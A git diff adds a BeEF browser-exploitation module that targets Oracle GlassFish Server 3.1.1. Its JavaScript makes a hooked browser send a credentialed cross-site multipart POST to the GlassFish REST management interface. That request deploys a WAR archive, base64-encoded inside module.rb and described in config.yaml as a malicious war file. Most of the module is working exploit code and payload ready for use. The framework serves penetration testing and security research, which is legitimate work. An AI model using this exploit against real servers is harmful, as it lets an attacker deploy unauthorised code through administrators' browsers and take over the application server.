diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js new file mode 100644 index 000000000..a7d2744ad --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/command.js @@ -0,0 +1,224 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com +// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html + + +beef.execute(function() { + var restHost = '<%= @restHost %>'; + var warName = '<%= @warName %>'; + var warBase = '<%= @warBase %>'; + + var logUrl = restHost + '/management/domain/applications/application'; + + //BEGIN Daniel Guerrero binary Base64-library +/* +Copyright (c) 2011, Daniel Guerrero +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of the Daniel Guerrero nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY +DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +/** + * Uses the new array typed in javascript to binary base64 encode/decode + * at the moment just decodes a binary base64 encoded + * into either an ArrayBuffer (decodeArrayBuffer) + * or into an Uint8Array (decode) + * + * References: + * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer + * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array + */ + +var Base64Binary = { + _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", + + /* will return a Uint8Array type */ + decodeArrayBuffer: function(input) { + var bytes = Math.ceil( (3*input.length) / 4.0); + var ab = new ArrayBuffer(bytes); + this.decode(input, ab); + + return ab; + }, + + decode: function(input, arrayBuffer) { + //get last chars to see if are valid + var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); + var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); + + var bytes = Math.ceil( (3*input.length) / 4.0); + if (lkey1 == 64) bytes--; //padding chars, so skip + if (lkey2 == 64) bytes--; //padding chars, so skip + + var uarray; + var chr1, chr2, chr3; + var enc1, enc2, enc3, enc4; + var i = 0; + var j = 0; + + if (arrayBuffer) + uarray = new Uint8Array(arrayBuffer); + else + uarray = new Uint8Array(bytes); + + input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); + + for (i=0; i> 4); + chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); + chr3 = ((enc3 & 3) << 6) | enc4; + + uarray[i] = chr1; + if (enc3 != 64) uarray[i+1] = chr2; + if (enc4 != 64) uarray[i+2] = chr3; + } + + return uarray; + } +} + //END Daniel Guerrero binary Base64-library + + if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + function fileUpload(fileData, fileName) { + boundary = "HELLOWORLD270883142628617", + uri = logUrl, + xhr = new XMLHttpRequest(); + + var additionalFields = { + asyncreplication: "true", + availabilityenabled: "false", + contextroot: "", + createtables: "true", + dbvendorname: "", + deploymentplan: "", + description: "", + dropandcreatetables: "true", + enabled: "true", + force: "false", + generatermistubs: "false", + isredeploy: "false", + keepfailedstubs: "false", + keepreposdir: "false", + keepstate: "true", + lbenabled: "true", + libraries: "", + logReportedErrors: "true", + name: "", + precompilejsp: "false", + properties: "", + property: "", + retrieve: "", + target: "", + type: "", + uniquetablenames: "true", + verify: "false", + virtualservers: "", + __remove_empty_entries__: "true" + } + + + var fileFieldName = "id"; + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. + xhr.withCredentials = "true"; + xhr.onreadystatechange = function() { + if (xhr.readyState == 4) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); + } + } + + var body = ""; + + for (var i in additionalFields) { + if (additionalFields.hasOwnProperty(i)) { + body += addField(i, additionalFields[i], boundary); + } + } + + body += addFileField(fileFieldName, fileData, fileName, boundary); + body += "--" + boundary + "--"; + xhr.setRequestHeader('Content-length', body.length); + xhr.sendAsBinary(body); + return true; + } + + function addField(name, value, boundary) { + var c = "--" + boundary + "\r\n" + c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'; + c += value + "\r\n"; + return c; + } + + function addFileField(name, value, filename, boundary) { + var c = "--" + boundary + "\r\n" + c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; + c += "Content-Type: application/octet-stream\r\n\r\n"; + + for(var i = 0; i< value.length; i++){ + c+=String.fromCharCode(value[i] & 0xff); + } + + c += "\r\n"; + return c; + } + + + function start() { + fileUpload(Base64Binary.decode(warBase),warName); + } + + start(); + +}); + diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml new file mode 100644 index 000000000..c065be089 --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + glassfish_war_upload_xsrf: + enable: true + category: "Exploits" + name: "GlassFish WAR Upload XSRF" + description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12). It makes advantage of a CSRF bug in the REST interface.
For more information refer to http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html." + authors: ["Bart Leppens"] + target: + working: ["FF","S","C"] diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb new file mode 100644 index 000000000..a18ca8cd4 --- /dev/null +++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb @@ -0,0 +1,32 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Glassfish_war_upload_xsrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'restHost', 'ui_label'=>'Host', 'type' => 'textarea', 'value' =>'http://glassfishserver:4848', 'width' => '400px', 'height' => '25px'}, + {'name' => 'warName', 'ui_label' => 'Filename', 'value' => 'hello.war', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }, + {'name' => 'warBase', 'ui_label' => 'Base64 of exploit', 'value' => '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', 'type' => 'textarea', 'width' => '400px', 'height' => '800px' } + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end